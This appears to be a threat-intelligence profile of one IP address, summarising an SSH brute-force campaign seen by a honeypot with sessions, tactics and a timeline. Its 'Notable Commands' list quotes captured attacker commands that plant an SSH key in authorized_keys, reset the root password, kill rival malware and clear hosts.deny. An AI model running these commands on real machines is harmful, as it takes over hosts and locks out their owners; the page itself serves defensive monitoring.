154.81.15.82

Threat Confidence
59%
Location
🇸🇨 SC
ASN
AS135377 · UCLOUD INFORMATION TECHNOLOGY HK LIMITED
Cloud Provider
Total Events
338
Top 10% by volume
Agent Count
1
First / Last Seen
2026-05-15 19:59 — 2026-05-15 21:14
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Reconnaissance
Initial Access
Defense Evasion
Credential Access
Discovery
Command and Control
External Corroboration
Blocklist.de
Reported 2026-05-16 20:01
blocklist_de:reported
Session Forensics
scanner ×20 malware_dropper ×4 credential_probe ×13 opportunistic_bruter ×1
Sessions
38 (5 with login)
Avg Depth Score
0.27
Commands Executed
63
Files Downloaded
7
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
  • cat /proc/cpuinfo | grep name | wc -l
  • echo "root:BPZYpWGOE83D"|chpasswd|bash
  • rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
  • cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
  • free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
  • ls -lh $(which ls)
  • which ls
  • echo "root:t1br9l5Wu334"|chpasswd|bash
  • echo "root:26z3rvR7LQbZ"|chpasswd|bash
Fingerprints
SSH-2.0-libssh_0.9.6
Evidence Timeline
Credential Probe 5deaef2b8f2e newark_01 · 2026-05-15 21:14
1 20%
Credential Probe 87878401cbc0 newark_01 · 2026-05-15 21:11
1 20%
Credential Probe 8adff800d99f newark_01 · 2026-05-15 21:08
1 20%
Scanner 41eb224d9032 newark_01 · 2026-05-15 21:06
15%
Scanner 79b818870e17 newark_01 · 2026-05-15 21:04
15%
Scanner c08c7b2820dc newark_01 · 2026-05-15 21:01
15%
Scanner 48ed44dd2629 newark_01 · 2026-05-15 20:59
15%
Scanner b08b63e7d3b9 newark_01 · 2026-05-15 20:56
15%
Credential Probe 18a6893b7b06 newark_01 · 2026-05-15 20:54
1 20%
Credential Probe db1dac415698 newark_01 · 2026-05-15 20:51
1 20%
Scanner 7d1662465d9c newark_01 · 2026-05-15 20:49
15%
Scanner eb22d199d05b newark_01 · 2026-05-15 20:46
15%
Malware Dropper 3cac8bc78106 newark_01 · 2026-05-15 20:46
3 1 1 100%
Opportunistic Bruter db2e202aa100 newark_01 · 2026-05-15 20:46
1 50%
Credential Probe 86e35b6ea4e6 newark_01 · 2026-05-15 20:44
1 20%
Scanner 8d459c92530b newark_01 · 2026-05-15 20:41
15%
Scanner f531830cff80 newark_01 · 2026-05-15 20:39
15%
Scanner 94b2b73992a7 newark_01 · 2026-05-15 20:36
15%
Credential Probe a8379410eecc newark_01 · 2026-05-15 20:34
1 20%
Credential Probe 118996a28f56 newark_01 · 2026-05-15 20:31
1 20%
Credential Probe 0441449733d1 newark_01 · 2026-05-15 20:29
1 20%
Credential Probe df7076a4fe74 newark_01 · 2026-05-15 20:26
1 20%
Credential Probe cf73d93dec2f newark_01 · 2026-05-15 20:24
1 20%
Scanner d3159b36d936 newark_01 · 2026-05-15 20:21
15%
Malware Dropper 7134f0267eb2 newark_01 · 2026-05-15 20:21
20 2 1 100%
Scanner b18f917905ba newark_01 · 2026-05-15 20:21
15%
Malware Dropper 6b7015cbc911 newark_01 · 2026-05-15 20:19
20 2 1 100%
Scanner 3c6a2f733474 newark_01 · 2026-05-15 20:19
15%
Scanner b8f874f6ece5 newark_01 · 2026-05-15 20:19
15%
Scanner 286e9b811c9b newark_01 · 2026-05-15 20:16
15%
Credential Probe 3ec1d0363d42 newark_01 · 2026-05-15 20:14
1 20%
Scanner 1a3b830dd397 newark_01 · 2026-05-15 20:11
15%
Scanner acd6ec934624 newark_01 · 2026-05-15 20:08
15%
Malware Dropper ff674bc0c554 newark_01 · 2026-05-15 20:06
20 2 1 100%
Scanner ddb0c7c93a84 newark_01 · 2026-05-15 20:06
15%
Scanner 578d29ae52e4 newark_01 · 2026-05-15 20:06
15%
Scanner 882fe7288920 newark_01 · 2026-05-15 20:03
15%
Credential Probe c7952c8134f3 newark_01 · 2026-05-15 19:59
1 20%